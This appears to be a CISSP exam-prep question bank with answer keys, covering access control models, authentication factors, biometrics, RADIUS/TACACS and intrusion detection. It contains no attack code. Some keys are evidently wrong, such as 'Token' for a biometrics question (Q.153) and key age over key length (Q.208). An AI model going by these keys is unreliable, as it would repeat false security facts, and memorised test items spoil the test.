A#CISSP2 Q.81:  MAC is used for: 	^A: Defining imposed access control level.	^B: Defining user preferences.	^C: None of the choices.	^D: Defining discretionary access control level.
C#CISSP2 Q.82:  With MAC, who may make decisions that bear on policy? 	^A: None of the choices.	^B: All users.	^C: Only the administrator.	^D: All users except guests.
A#CISSP2 Q.83:  With MAC, who may NOT make decisions that derive from policy? 	^A: All users except the administrator.	^B: The administrator.	^C: The power users.	^D: The guests.
B#CISSP2 Q.84:  Under the MAC control system, what is required? 	^A: Performance monitoring	^B: Labelling	^C: Sensing	^D: None of the choices
C#CISSP2 Q.85:  Access controls that are not based on the policy are characterized as: 	^A: Secret controls	^B: Mandatory controls	^C: Discretionary controls	^D: Corrective controls
A#CISSP2 Q.86:  DAC are characterized by many organizations as: 	^A: Need-to-know controls	^B: Preventive controls	^C: Mandatory adjustable controls	^D: None of the choices
C#CISSP2 Q.87:  Which of the following correctly describe DAC? 	^A: It is the most secure method.	^B: It is of the B2 class.	^C: It can extend beyond limiting which subjects can gain what type of access to which objects.	^D: It is of the B1 class.
B#CISSP2 Q.88:  Under DAC, a subject's rights must be ________ when it leaves an organization altogether. 	^A: recycled	^B: terminated	^C: suspended	^D: resumed
B#CISSP2 Q.89:  Audit trail is a category of what control? 	^A: System, Manual	^B: Detective, Technical	^C: User, Technical	^D: Detective, Manual
B#CISSP2 Q.90:  IDS is a category of what control? 	^A: Detective, Manual	^B: Detective, Technical	^C: User, Technical	^D: System, Manual
D#CISSP2 Q.91:  Which of the following is not a detective technical control? 	^A: Intrusion detection system	^B: Violation reports	^C: Honeypot	^D: None of the choices.
D#CISSP2 Q.92:  ________ Technical Controls warn of technical Access Control violations.	^A: Elusive	^B: Descriptive	^C: Corrective	^D: Detective
D#CISSP2 Q.93:  A two factor authentication method is considered as a: 	^A: Technical control	^B: Patching control	^C: Corrective control	^D: Logical control
B#CISSP2 Q.94:  Which of the following will you NOT consider as technical controls? 	^A: Access Control software	^B: Man trap	^C: Passwords	^D: Antivirus Software
B#CISSP2 Q.95:  ___________________ are the technical ways of restricting who or what can access system resources. 	^A: Preventive Manual Controls	^B: Detective Technical Controls	^C: Preventive Circuit Controls	^D: Preventive Technical Controls
B#CISSP2 Q.96:  Preventive Technical Controls is usually built: 	^A: By using MD5.	^B: Into an operating system.	^C: By security officer.	^D: By security administrator.
D#CISSP2 Q.97:  Preventive Technical Controls cannot: 	^A: Protect the OS from unauthorized modification.	^B: Protect confidential information from being disclosed to unauthorized persons.	^C: Protect the OS from unauthorized manipulation.	^D: Protect users from being monitored.
D#CISSP2 Q.98:  How do Preventive Technical Controls protect system integrity and availability? 	^A: By limiting the number of threads only.	^B: By limiting the number of system variables.	^C: By limiting the number of function calls only.	^D: By limiting the number of users and/or processes.
C#CISSP2 Q.99:  Sensor is: 	^A: Logical, Physical	^B: Corrective, Logical	^C: Detective, Physical	^D: Corrective, Physical
D#CISSP2 Q.100:  Motion detector is a feature of: 	^A: Corrective Logical Controls.	^B: Logical Physical Controls.	^C: Corrective Physical Controls.	^D: Detective Physical Controls.
A#CISSP2 Q.101:  Closed circuit TV is a feature of: 	^A: Detective Physical Controls	^B: Corrective Physical Controls	^C: Corrective Logical Controls	^D: Logical Physical Controls
B#CISSP2 Q.102:  Access control is the collection of mechanisms that permits managers of a system to exercise influence over the use of: 	^A: A man guard	^B: An IS system	^C: A threshold	^D: A Trap
B#CISSP2 Q.103:  Access control allows you to exercise directing influence over which of the following aspects of a system? 	^A: Behavior, user, and content provider.	^B: Behavior, use, and content.	^C: User logs and content.	^D: None of the choices.
B#CISSP2 Q.104:  The principle of accountability is a principle by which specific action can be traced back to: 	^A: A policy	^B: An individual	^C: A group	^D: A manager
C#CISSP2 Q.105:  The principle of _________ is a principle by which specific action can be traced back to any one of your users. 	^A: Security	^B: Integrity	^C: Accountability	^D: Policy
D#CISSP2 Q.106:  According to the principle of accountability, what action should be traceable to a specific user? 	^A: Material	^B: Intangible	^C: Tangible	^D: Significant
C#CISSP2 Q.107:  A significant action has a state that enables actions on an ADP system to be traced to individuals who may then be held responsible. The actions do NOT include: 	^A: Violations of security policy.	^B: Attempted violations of security policy.	^C: Non-violations of security policy.	^D: Attempted violations of allowed actions.
A#CISSP2 Q.108:  ____________ is the means by which the ability to do something with a computer resource is explicitly enabled or restricted. 	^A: Access control	^B: Type of access	^C: System resource	^D: Work permit
A#CISSP2 Q.109:  The ability to do something with a computer resource can be explicitly enabled or restricted through: 	^A: Physical and system-based controls.	^B: Theoretical and system-based controls.	^C: Mental and system-based controls.	^D: Physical and trap-based controls.
C#CISSP2 Q.110:  The main categories of access control do NOT include:	^A: Administrative Access Control	^B: Logical Access Control	^C: Random Access Control	^D: Physical Access Control
D#CISSP2 Q.111:  You have very strict Physical Access controls. At the same time you have loose Logical Access Controls. What is true about this setting? 	^A: None of the choices.	^B: It can 100% secure your environment.	^C: It may secure your environment.	^D: It may not secure your environment.
A#CISSP2 Q.112:  Which of the following is NOT a type of access control? 	^A: Intrusive	^B: Deterrent	^C: Detective	^D: Preventive
A#CISSP2 Q.113:  As a type of access control, which of the following asks for avoiding occurrence? 	^A: Preventive	^B: Deterrent	^C: Intrusive	^D: Detective
C#CISSP2 Q.114:  As a type of access control, which of the following asks for identifying occurrences? 	^A: Deterrent	^B: Preventive	^C: Detective	^D: Intrusive
C#CISSP2 Q.115:  As a type of access control, which of the following asks for discouraging occurrence? 	^A: Detective	^B: Intrusive	^C: Deterrent	^D: Preventive
C#CISSP2 Q.116:  As a type of access control, which of the following asks for restoring controls? 	^A: Deterrent	^B: Intrusive	^C: Corrective	^D: Preventive
A#CISSP2 Q.117:  What type of access control focuses on restoring resources? 	^A: Recovery	^B: Preventive	^C: Intrusive	^D: Corrective
C#CISSP2 Q.118:  What scheme includes the requirement that the system maintain the separation of duty requirement expressed in the access control triples? 	^A: Bella	^B: Lattice	^C: Clark-Wilson	^D: Bell-LaPadula
B#CISSP2 Q.119:  What is an access control model? 	^A: A formal description of access control ID specification.	^B: A formal description of security policy.	^C: A formal description of a sensibility label.	^D: None of the choices.
B#CISSP2 Q.120:  Which of the following is true about MAC? 	^A: It is more flexible than DAC.	^B: It is more secure than DAC.	^C: It is less secure than DAC.	^D: It is more scalable than DAC.
C#CISSP2 Q.121:  The access matrix model consists of which of the following parts? (Choose all that apply) 	^A: A function that returns an object's type.	^B: A list of subjects.	^C: All of the choices.	^D: A list of objects.
A#CISSP2 Q.122:  The access matrix model has which of the following common implementations? 	^A: Access control lists and capabilities.	^B: Access control lists.	^C: Capabilities.	^D: Access control list and availability.
B#CISSP2 Q.123:  What can be accomplished by storing on each subject a list of rights the subject has for every object? 	^A: Object	^B: Capabilities	^C: Key ring	^D: Rights
B#CISSP2 Q.124:  Which of the following is true regarding a secure access model? 	^A: Secure information cannot flow to a more secure user.	^B: Secure information cannot flow to a less secure user.	^C: Secure information can flow to a less secure user.	^D: None of the choices.
A#CISSP2 Q.125:  In the Information Flow Model, what relates two versions of the same object? 	^A: Flow	^B: State	^C: Transformation	^D: Successive points
D#CISSP2 Q.126:  In the Information Flow Model, what acts as a type of dependency? 	^A: State	^B: Successive points	^C: Transformation	^D: Flow
C#CISSP2 Q.127:  The lattice-based model aims at protecting against: 	^A: Illegal attributes.	^B: None of the choices.	^C: Illegal information flow among the entities.	^D: Illegal access rights
B#CISSP2 Q.128:  Which of the following are the components of the Chinese wall model? 	^A: Conflict of interest classes.	^B: All of the choices.	^C: Subject	^D: Company Datasets.
B#CISSP2 Q.129:  Which of the following correctly describe the difference between identification and authentication? 	^A: Authentication is a means to verify who you are, while identification is what you are authorized to perform.	^B: Identification is a means to verify who you are, while authentication is what you are authorized to perform.	^C: Identification is another name of authentication.	^D: Identification is the child process of authentication.
B#CISSP2 Q.130:  Identification establishes: 	^A: Authentication	^B: Accountability	^C: Authorization	^D: None of the choices.
A#CISSP2 Q.131:  Identification usually takes the form of: 	^A: Login ID.	^B: User password.	^C: None of the choices.	^D: Passphrase
D#CISSP2 Q.132:  Authentication is typically based upon: 	^A: Something you have.	^B: Something you know.	^C: Something you are.	^D: All of the choices.
B#CISSP2 Q.133:  A password represents: 	^A: Something you have.	^B: Something you know.	^C: All of the choices.	^D: Something you are.
C#CISSP2 Q.134:  A smart card represents: 	^A: Something you are.	^B: Something you know.	^C: Something you have.	^D: All of the choices.
A#CISSP2 Q.135:  Retinal scans check for: 	^A: Something you are.	^B: Something you have.	^C: Something you know.	^D: All of the choices.
D#CISSP2 Q.136:  Which of the following is the most commonly used check on something you know? 	^A: One time password	^B: Login phrase	^C: Retinal	^D: Password
A#CISSP2 Q.137:  Software generated password has what drawback? 	^A: Password not easy to remember.	^B: Password too secure.	^C: None of the choices.	^D: Password unbreakable.
B#CISSP2 Q.138:  Which of the following will you consider as most secure? 	^A: Password	^B: One time password	^C: Login phrase	^D: Login ID
C#CISSP2 Q.139:  What type of password makes use of two totally unrelated words? 	^A: Login phrase	^B: One time password	^C: Composition	^D: Login ID
D#CISSP2 Q.140:  Which of the following are the advantages of using passphrase? 	^A: Difficult to crack using brute force.	^B: Offers numerous characters.	^C: Easier to remember.	^D: All of the choices.
B#CISSP2 Q.141:  Which of the following is the correct account policy you should follow? 	^A: All of the choices.	^B: All active accounts must have a password.	^C: All active accounts must have a long and complex pass phrase.	^D: All inactive accounts must have a password.
B#CISSP2 Q.142:  On UNIX systems, passwords shall be kept: 	^A: In any location on behalf of root.	^B: In a shadow password file.	^C: In the /etc/passwd file.	^D: In root.
B#CISSP2 Q.143:  Which of the following are the correct guidelines of password deployment? 	^A: Passwords must be masked.	^B: All of the choices.	^C: Password must have a minimum of 8 characters.	^D: Password must contain a mix of both alphabetic and non-alphabetic characters.
A#CISSP2 Q.144:  Why would a 16-character password not be desirable? 	^A: Hard to remember	^B: Offers numerous characters.	^C: Difficult to crack using brute force.	^D: All of the choices.
C#CISSP2 Q.145:  Which of the following is NOT a good password deployment guideline? 	^A: Passwords must not be the same as user id or login id.	^B: Password aging must be enforced on all systems.	^C: Password must be easy to memorize.	^D: Passwords must be changed at least once every 60 days, depending on your environment.
B#CISSP2 Q.146:  Routing password can be restricted by the use of: 	^A: Password age	^B: Password history	^C: Complex password	^D: All of the choices
A#CISSP2 Q.147:  Which of the following is an effective measure against a certain type of brute force password attack? 	^A: Password used must not be a word found in a dictionary.	^B: Password history is used.	^C: Password reuse is not allowed.	^D: None of the choices.
D#CISSP2 Q.148:  Which of the following are measures against password sniffing? 	^A: Passwords must not be sent through email in plain text.	^B: Passwords must not be stored in plain text on any electronic media.	^C: You may store passwords electronically if it is encrypted.	^D: All of the choices.
B#CISSP2 Q.149:  What should you do immediately if the root password is compromised? 	^A: Change the root password.	^B: Change all passwords.	^C: Increase the value of password age.	^D: Decrease the value of password history.
B#CISSP2 Q.150:  Which of the following is the most secure way to distribute password? 	^A: Employees must send in an email before obtaining a password.	^B: Employees must show up in person and present proper identification before obtaining a password.	^C: Employees must send in a signed email before obtaining a password.	^D: None of the choices.
C#CISSP2 Q.151:  Which of the following can be used to protect your system against brute force password attack? 	^A: Decrease the value of password history.	^B: Employees must send in a signed email before obtaining a password.	^C: After three unsuccessful attempts to enter a password, the account will be locked.	^D: Increase the value of password age.
C#CISSP2 Q.152:  You should keep audit trail on which of the following items? 	^A: Password usage.	^B: All unsuccessful logon.	^C: All of the choices.	^D: All successful logon.
B#CISSP2 Q.153:  What type of authentication takes advantage of an individual's unique physical characteristics in order to authenticate that person's identity? 	^A: Password	^B: Token	^C: Ticket Granting	^D: Biometric
A#CISSP2 Q.154:  Which of the following will you consider as the MOST secure way of authentication? 	^A: Biometric	^B: Password	^C: Token	^D: Ticket Granting
A#CISSP2 Q.155:  Biometric performance is most commonly measured in terms of: 	^A: FRR and FAR	^B: FAC and ERR	^C: IER and FAR	^D: FRR and GIC
B#CISSP2 Q.156:  What is known as the probability that you are not authenticated to access your account? 	^A: ERR	^B: FRR	^C: MTBF	^D: FAR
B#CISSP2 Q.157:  What is known as the chance that someone other than you is granted access to your account? 	^A: ERR	^B: FAR	^C: FRR	^D: MTBF
A#CISSP2 Q.158:  You are comparing biometric systems. Security is the top priority. A low ________ is most important in this regard. 	^A: FAR	^B: FRR	^C: MTBF	^D: ERR
D#CISSP2 Q.159:  The quality of finger prints is crucial to maintain the necessary: 	^A: FRR	^B: ERR and FAR	^C: FAR	^D: FRR and FAR
C#CISSP2 Q.160:  By requiring the user to use more than one finger to authenticate, you can: 	^A: Provide statistical improvements in EAR.	^B: Provide statistical improvements in MTBF.	^C: Provide statistical improvements in FRR.	^D: Provide statistical improvements in ERR.
B#CISSP2 Q.161:  Which of the following is being considered as the most reliable kind of personal identification? 	^A: Token	^B: Finger print	^C: Password	^D: Ticket Granting
D#CISSP2 Q.162:  Which of the following methods is more microscopic and will analyze the direction of the ridges of the fingerprints for matching? 	^A: None of the choices.	^B: Flow direct	^C: Ridge matching	^D: Minutia matching
B#CISSP2 Q.163:  Which of the following are the types of eye scan in use today? 	^A: Retinal scans and body scans.	^B: Retinal scans and iris scans.	^C: Retinal scans and reflective scans.	^D: Reflective scans and iris scans.
B#CISSP2 Q.164:  Which of the following eye scan methods is considered to be more intrusive? 	^A: Iris scans	^B: Retinal scans	^C: Body scans	^D: Reflective scans
B#CISSP2 Q.165:  Which of the following offers greater accuracy than the others? 	^A: Facial recognition	^B: Iris scanning	^C: Finger scanning	^D: Voice recognition
B#CISSP2 Q.166:  Which of the following are the valid categories of hand geometry scanning? 	^A: Electrical and image-edge detection.	^B: Mechanical and image-edge detection.	^C: Logical and image-edge detection.	^D: Mechanical and image-ridge detection.
A#CISSP2 Q.167:  In the world of keystroke dynamics, what represents the amount of time you hold down a particular key? 	^A: Dwell time	^B: Flight time	^C: Dynamic time	^D: Systems time
B#CISSP2 Q.168:  In the world of keystroke dynamics, what represents the amount of time it takes a person to switch between keys? 	^A: Dynamic time	^B: Flight time	^C: Dwell time	^D: Systems time.
D#CISSP2 Q.169:  Which of the following are the benefits of Keystroke dynamics? 	^A: Low cost	^B: Unintrusive device	^C: Transparent	^D: All of the choices.
B#CISSP2 Q.170:  DSV as an identification method check against users: 	^A: Fingerprints	^B: Signature	^C: Keystrokes	^D: Facial expression
A#CISSP2 Q.171:  Signature identification systems analyze what areas of an individual's signature? 	^A: All of the choices EXCEPT the signing rate.	^B: The specific features of the signature.	^C: The specific features of the process of signing one's signature.	^D: The signature rate.
A#CISSP2 Q.172:  What are the advantages to using voice identification?	^A: All of the choices.	^B: Timesaving	^C: Reliability	^D: Flexibility
B#CISSP2 Q.173:  What are the methods used in the process of facial identification? 	^A: None of the choices.	^B: Detection and recognition.	^C: Scanning and recognition.	^D: Detection and scanning.
A#CISSP2 Q.174:  In the process of facial identification, the basic underlying recognition technology of facial identification involves: 	^A: Eigenfeatures of eigenfaces.	^B: Scanning and recognition.	^C: Detection and scanning.	^D: None of the choices.
C#CISSP2 Q.175:  Which of the following is a facial feature identification product that can employ artificial intelligence and can require the system to learn from experience? 	^A: All of the choices.	^B: Digital nervous system.	^C: Neural networking	^D: DSV
B#CISSP2 Q.176:  What is typically used to illustrate the comparative strengths and weaknesses of each biometric technology? 	^A: Decipher Chart	^B: Zephyr Chart	^C: Cipher Chart	^D: Zapper Chart
B#CISSP2 Q.177:  In terms of the order of effectiveness, which of the following technologies is the most effective? 	^A: Fingerprint	^B: Iris scan	^C: Keystroke pattern	^D: Retina scan
B#CISSP2 Q.178:  In terms of the order of effectiveness, which of the following technologies is the least effective? 	^A: Voice pattern	^B: Signature	^C: Keystroke pattern	^D: Hand geometry
C#CISSP2 Q.179:  In terms of the order of acceptance, which of the following technologies is the MOST accepted? 	^A: Hand geometry	^B: Keystroke pattern	^C: Voice Pattern	^D: Signature
D#CISSP2 Q.180:  In terms of the order of acceptance, which of the following technologies is the LEAST accepted? 	^A: Fingerprint	^B: Iris	^C: Handprint	^D: Retina patterns
C#CISSP2 Q.181:  Token, as a way to identify user, is subject to what type of error? 	^A: Token error	^B: Decrypt error	^C: Human error	^D: Encrypt error
C#CISSP2 Q.182:  Which of the following factors may render a token based solution unusable? 	^A: Token length	^B: Card size	^C: Battery lifespan	^D: None of the choices.
D#CISSP2 Q.183:  Memory only card works based on: 	^A: Something you have.	^B: Something you know.	^C: None of the choices.	^D: Something you know and something you have.
D#CISSP2 Q.184:  Which of the following is a disadvantage of memory only card? 	^A: High cost to develop.	^B: High cost to operate.	^C: Physically infeasible.	^D: Easy to counterfeit.
D#CISSP2 Q.185:  The word smart card has meanings of: 	^A: Personal identity token containing IC-s.	^B: Processor IC card.	^C: IC card with ISO 7816 interface.	^D: All of the choices.
C#CISSP2 Q.186:  Processor card contains which of the following components? 	^A: Memory and hard drive.	^B: Memory and flash.	^C: Memory and processor.	^D: Cache and processor.
D#CISSP2 Q.187:  Attacks on smartcards generally fall into what categories? 	^A: Physical attacks.	^B: Trojan Horse attacks.	^C: Logical attacks.	^D: All of the choices, plus Social Engineering attacks.
B#CISSP2 Q.188:  What type of attacks occurs when a smartcard is operating under normal physical conditions, but sensitive information is gained by examining the bytes going to and from the smartcard? 	^A: Physical attacks.	^B: Logical attacks.	^C: Trojan Horse attacks.	^D: Social Engineering attacks.
A#CISSP2 Q.189:  What type of attacks occurs when normal physical conditions are altered in order to gain access to sensitive information on the smartcard? 	^A: Physical attacks	^B: Logical attacks	^C: Trojan Horse attacks	^D: Social Engineering attacks
C#CISSP2 Q.190:  What type of attacks occurs when a rogue application has been planted on an unsuspecting user's workstation?	^A: Physical attacks	^B: Logical attacks	^C: Trojan Horse attacks	^D: Social Engineering attacks
A#CISSP2 Q.191:  What is an effective countermeasure against Trojan horse attack that targets smart cards?	^A: Single-access device driver architecture.	^B: Handprint driver architecture.	^C: Fingerprint driver architecture.	^D: All of the choices.
C#CISSP2 Q.192:  Which of the following attacks could be the most successful when the security technology is properly implemented and configured? 	^A: Logical attacks	^B: Physical attacks	^C: Social Engineering attacks	^D: Trojan Horse attacks
A#CISSP2 Q.193:  What are the valid types of one time password generator? ^A: All of the choices.	^B: Transaction synchronous	^C: Synchronous/PIN synchronous	^D: Asynchronous/PIN asynchronous
A#CISSP2 Q.194:  What are the benefits of job rotation? 	^A: All of the choices.	^B: Trained backup in case of emergencies.	^C: Protect against fraud.	^D: Cross training to employees.
A#CISSP2 Q.195:  In order to avoid mishandling of media or information, you should consider to use: 	^A: Labeling	^B: Token	^C: Ticket	^D: SLL
A#CISSP2 Q.196:  In order to avoid mishandling of media or information, which of the following should be labeled? 	^A: All of the choices.	^B: Printed copies	^C: Tape	^D: Floppy disks
C#CISSP2 Q.197:  A method for a user to identify and present credentials only once to a system is known as: 	^A: SEC	^B: IPSec	^C: SSO	^D: SSL
A#CISSP2 Q.198:  Which of the following correctly describe the features of SSO? 	^A: More efficient log-on.	^B: More costly to administer.	^C: More costly to setup.	^D: More key exchanging involved.
B#CISSP2 Q.199:  What is a protocol used for carrying authentication, authorization, and configuration information between a Network Access Server and a shared Authentication Server? 	^A: IPSec	^B: RADIUS	^C: L2TP	^D: PPTP
C#CISSP2 Q.200:  RADIUS is defined by which RFC? 	^A: 2168	^B: 2148	^C: 2138	^D: 2158
A#CISSP2 Q.201:  In a RADIUS architecture, which of the following acts as a client?	^A: A network Access Server.	^B: None of the choices.	^C: The end user.	^D: The authentication server.
C#CISSP2 Q.202:  In a RADIUS architecture, which of the following can act as a proxy client? 	^A: The end user.	^B: A Network Access Server.	^C: The RADIUS authentication server.	^D: None of the choices.
D#CISSP2 Q.203:  What protocol was UDP based and mainly intended to provide validation of dial up user login passwords? 	^A: PPTP	^B: L2TP	^C: IPSec	^D: TACACS
C#CISSP2 Q.204:  Which of the following are proprietarily implemented by CISCO? 	^A: RADIUS+	^B: TACACS	^C: XTACACS and TACACS+	^D: RADIUS
B#CISSP2 Q.205:  In Unix, which file is required for you to set up an environment such that every user on the other host is a trusted user that can log into this host without authentication? 	^A: /etc/shadow	^B: /etc/host.equiv	^C: /etc/passwd	^D: None of the choices.
D#CISSP2 Q.206:  Information security is the protection of data. Information will be protected mainly based on:	^A: Its sensitivity to the company.	^B: Its confidentiality.	^C: Its value.	^D: All of the choices.
B#CISSP2 Q.207:  Which of the following actions can increase the cost of an exhaustive attack? 	^A: Increase the age of a password.	^B: Increase the length of a password.	^C: None of the choices.	^D: Increase the history of a password.
C#CISSP2 Q.208:  Which of the following actions can make a cryptographic key more resistant to an exhaustive attack? 	^A: None of the choices.	^B: Increase the length of a key.	^C: Increase the age of a key.	^D: Increase the history of a key.
D#CISSP2 Q.209:  What attack involves actions to mimic one's identity? 	^A: Brute force	^B: Exhaustive	^C: Social engineering	^D: Spoofing
C#CISSP2 Q.210:  What attack takes advantage of operating system buffer overflows? 	^A: Spoofing	^B: Brute force	^C: DoS	^D: Exhaustive
C#CISSP2 Q.211:  What attack is primarily based on the fragmentation implementation of IP and large ICMP packet size? 	^A: Exhaustive	^B: Brute force	^C: Ping of Death	^D: Spoofing
C#CISSP2 Q.212:  Land attack attacks a target by: 	^A: Producing large volume of ICMP echos.	^B: Producing fragmented IP packets.	^C: Attacking an established TCP connection.	^D: None of the choices.
A#CISSP2 Q.213:  What attack is primarily based on the fragmentation implementation of IP? 	^A: Teardrop	^B: Exhaustive	^C: Spoofing	^D: Brute force
D#CISSP2 Q.214:  What attack floods networks with broadcast traffic so that the network is congested? 	^A: Spoofing	^B: Teardrop	^C: Brute force	^D: SMURF
D#CISSP2 Q.215:  What attack involves repeatedly sending identical e-message to a particular address? 	^A: SMURF	^B: Brute force	^C: Teardrop	^D: Spamming
D#CISSP2 Q.216:  Which of the following attacks focus on cracking passwords? 	^A: SMURF	^B: Spamming	^C: Teardrop	^D: Dictionary
D#CISSP2 Q.217:  Man-in-the-middle attack is a real threat to what type of communication? 	^A: Communication based on random challenge.	^B: Communication based on face to face contact.	^C: Communication based on token.	^D: Communication based on asymmetric encryption.
B#CISSP2 Q.218:  Which of the following will you consider as a program that monitors data traveling over a network? 	^A: Smurfer	^B: Sniffer	^C: Fragmenter	^D: Spoofer
A#CISSP2 Q.219:  Individuals who have their sole aim as breaking into a computer system are being referred to as: 	^A: Crackers	^B: Sniffers	^C: Hackers	^D: None of the choices.
A#CISSP2 Q.220:  What technology is being used to detect anomalies? 	^A: IDS	^B: FRR	^C: Sniffing	^D: Capturing
C#CISSP2 Q.221:  IDSs verify, itemize, and characterize threats from:	^A: Inside your organization's network.	^B: Outside your organization's network.	^C: Outside and inside your organization's network.	^D: The Internet.
D#CISSP2 Q.222:  IDS can be described in terms of what fundamental functional components? 	^A: Response	^B: Information Sources	^C: Analysis	^D: All of the choices.
D#CISSP2 Q.223:  What are the primary goals of intrusion detection systems? 	^A: Accountability	^B: Availability	^C: Response	^D: All of the choices
A#CISSP2 Q.224:  What is the most common way to classify IDSs? 	^A: Group them by information source.	^B: Group them by network packets.	^C: Group them by attackers.	^D: Group them by signs of intrusion.
B#CISSP2 Q.225:  The majority of commercial intrusion detection systems are: 	^A: Identity-based	^B: Network-based	^C: Host-based	^D: Signature-based
A#CISSP2 Q.226:  Which of the following is a drawback of Network-based IDSs? 	^A: It cannot analyze encrypted information.	^B: It is very costly to setup.	^C: It is very costly to manage.	^D: It is not effective.
A#CISSP2 Q.227:  Host-based IDSs normally utilize information from which of the following sources? 	^A: Operating system audit trails and system logs.	^B: Operating system audit trails and network packets.	^C: Network packets and system logs.	^D: Operating system alarms and system logs.
A#CISSP2 Q.228:  When comparing host based IDS with network based ID, which of the following is an obvious advantage? 	^A: It is unaffected by switched networks.	^B: It cannot analyze encrypted information.	^C: It is not costly to setup.	^D: It is not costly to manage.
D#CISSP2 Q.229:  You are comparing host based IDS with network based ID. Which of the following will you consider as an obvious disadvantage of host based IDS? 	^A: It cannot analyze encrypted information.	^B: It is costly to remove.	^C: It is affected by switched networks.	^D: It is costly to manage.
B#CISSP2 Q.230:  Which of the following IDS inflict a higher performance cost on the monitored systems? 	^A: Encryption based	^B: Host based	^C: Network based	^D: Trusted based
D#CISSP2 Q.231:  Application-based IDSs normally utilize information from which of the following sources? 	^A: Network packets and system logs.	^B: Operating system audit trails and network packets.	^C: Operating system audit trails and system logs.	^D: Applications transaction log files.
A#CISSP2 Q.232:  What are the primary approaches IDS takes to analyze events to detect attacks? 	^A: Misuse detection and anomaly detection.	^B: Log detection and anomaly detection.	^C: Misuse detection and early drop detection.	^D: Scan detection and anomaly detection.
B#CISSP2 Q.233:  Misuse detectors analyze system activity and identify patterns. The patterns corresponding to known attacks are called: 	^A: Attachments	^B: Signatures	^C: Strings	^D: Identifications
C#CISSP2 Q.234:  Which of the following is an obvious disadvantage of deploying misuse detectors? 	^A: They are costly to setup.	^B: They are not accurate.	^C: They must be constantly updated with signatures of new attacks.	^D: They are costly to use.
C#CISSP2 Q.235:  What detectors identify abnormal unusual behavior on a host or network? 	^A: None of the choices.	^B: Legitimate detectors.	^C: Anomaly detectors.	^D: Normal detectors.
D#CISSP2 Q.236:  Which of the following are the major categories of IDSs response options? 	^A: Active responses	^B: Passive responses	^C: Hybrid	^D: All of the choices.
A#CISSP2 Q.237:  Alarms and notifications are generated by IDSs to inform users when attacks are detected. The most common form of alarm is:	^A: Onscreen alert	^B: Email	^C: Pager	^D: ICQ
A#CISSP2 Q.238:  Which of the following is a valid tool that complements IDSs? 	^A: All of the choices.	^B: Padded Cells	^C: Vulnerability Analysis Systems	^D: Honey Pots
B#CISSP2 Q.239:  What tool do you use to determine whether a host is vulnerable to known attacks? 	^A: Padded Cells	^B: Vulnerability analysis	^C: Honey Pots	^D: IDS
A#CISSP2 Q.240:  What tool is being used to determine whether attackers have altered system files or executables? 	^A: File Integrity Checker	^B: Vulnerability Analysis Systems	^C: Honey Pots	^D: Padded Cells
A#CISSP2 Q.241:  What is known as a decoy system designed to lure a potential attacker away from critical systems?	^A: Honey Pots	^B: Vulnerability Analysis Systems	^C: File Integrity Checker	^D: Padded Cells
B#CISSP2 Q.242:  When the IDS detects attackers, the attackers are seamlessly transferred to a special host. This method is called: 	^A: Vulnerability Analysis Systems	^B: Padded Cell	^C: Honey Pot	^D: File Integrity Checker
D#CISSP2 Q.243:  Most computer attacks result in violation of which of the following security properties? 	^A: Availability	^B: Confidentiality	^C: Integrity and control	^D: All of the choices.
D#CISSP2 Q.244:  What types of computer attacks are most commonly reported by IDSs? 	^A: System penetration	^B: Denial of service	^C: System scanning	^D: All of the choices
D#CISSP2 Q.245:  What attack is typically used for identifying the topology of the target network? 	^A: Spoofing	^B: Brute force	^C: Teardrop	^D: Scanning
D#CISSP3 Q.1:  In a discretionary mode, which of the following entities is authorized to grant information access to other people?	^A: Manager	^B: Group leader	^C: Security manager	^D: User
C#CISSP3 Q.2:  Which DES mode of operation is best suited for database encryption?	^A: Cipher Block Chaining (CBC) mode	^B: Cycling Redundancy Checking (CRC) mode	^C: Electronic Code Book (ECB) mode	^D: Cipher Feedback (CFB) mode
B#CISSP3 Q.3:  Within the realm of IT security, which of the following combinations best defines risk?	^A: Threat coupled with a breach.	^B: Threat coupled with a vulnerability.	^C: Vulnerability coupled with an attack.	^D: Threat coupled with a breach of security.
B#CISSP3 Q.4:  Which of the following would be the best reason for separating the test and development environments?	^A: To restrict access to systems under test.	^B: To control the stability of the test environment.	^C: To segregate user and development staff.	^D: To secure access to systems under development.
A#CISSP3 Q.5:  Which of the following statements pertaining to dealing with the media after a disaster occurred and disturbed the organization's activities is incorrect?	^A: The CEO should always be the spokesperson for the company during a disaster.	^B: The disaster recovery plan must include how the media is to be handled during the disaster.	^C: The organization's spokesperson should report bad news before the press gets a hold of it through another channel.	^D: An emergency press conference site should be planned ahead.
B#CISSP3 Q.6:  Which Orange book security rating introduces security labels?	^A: C2	^B: B1	^C: B2	^D: B3
A#CISSP3 Q.7:  A Business Impact Analysis (BIA) does not:  	^A: Recommend the appropriate recovery solution.	^B: Determine critical and necessary business functions and their resource dependencies.	^C: Identify critical computer applications and the associated outage tolerance.	^D: Estimate the financial impact of a disruption.
A#CISSP3 Q.8:  Which access control model enables the owner of the resource to specify what subjects can access specific resources?  	^A: Discretionary Access Control	^B: Mandatory Access Control	^C: Sensitive Access Control	^D: Role-based Access Control
C#CISSP3 Q.9:  What type of cable is used with 100Base-TX Fast Ethernet?	^A: Fiber-optic cable	^B: Four pairs of Category 3, 4 or 5 unshielded twisted-pair (UTP) wires.	^C: Two pairs of Category 5 unshielded twisted-pair (UTP) or Category 1 shielded twisted-pair (STP) wires.	^D: RG-58 cable.
B#CISSP3 Q.10:  Which of the following best describes the Secure Electronic Transaction (SET) protocol?	^A: Originated by VISA and MasterCard as an Internet credit card protocol.	^B: Originated by VISA and MasterCard as an Internet credit card protocol using digital signatures.	^C: Originated by VISA and MasterCard as an Internet credit card protocol using the transport layer.	^D: Originated by VISA and MasterCard as an Internet credit card protocol using SSL.			
D#CISSP3 Q.11:  At which of the following phases of a software development life cycle are security and access controls normally designed?	^A: Coding	^B: Product design	^C: Software plans and requirements	^D: Detailed design
C#CISSP3 Q.12:  Which type of control would password management classify as?	^A: Compensating control	^B: Detective control	^C: Preventive control	^D: Technical control
C#CISSP3 Q.13:  Due care is not related to:  	^A: Good faith	^B: Prudent man	^C: Profit	^D: Best interest
D#CISSP3 Q.14:  Which of the following is not an Orange Book-defined life cycle assurance requirement?	^A: Security testing	^B: Design specification and testing	^C: Trusted distribution	^D: System integrity
A#CISSP3 Q.15:  What is another name for the Orange Book?  	^A: The Trusted Computer System Evaluation Criteria (TCSEC)	^B: The Trusted Computing Base (TCB)	^C: The Information Technology Security Evaluation Criteria (ITSEC)	^D: The Common Criteria
C#CISSP3 Q.16:  A password that is the same for each log-on session is called a?  	^A: one-time password	^B: two-time password	^C: static password	^D: dynamic password
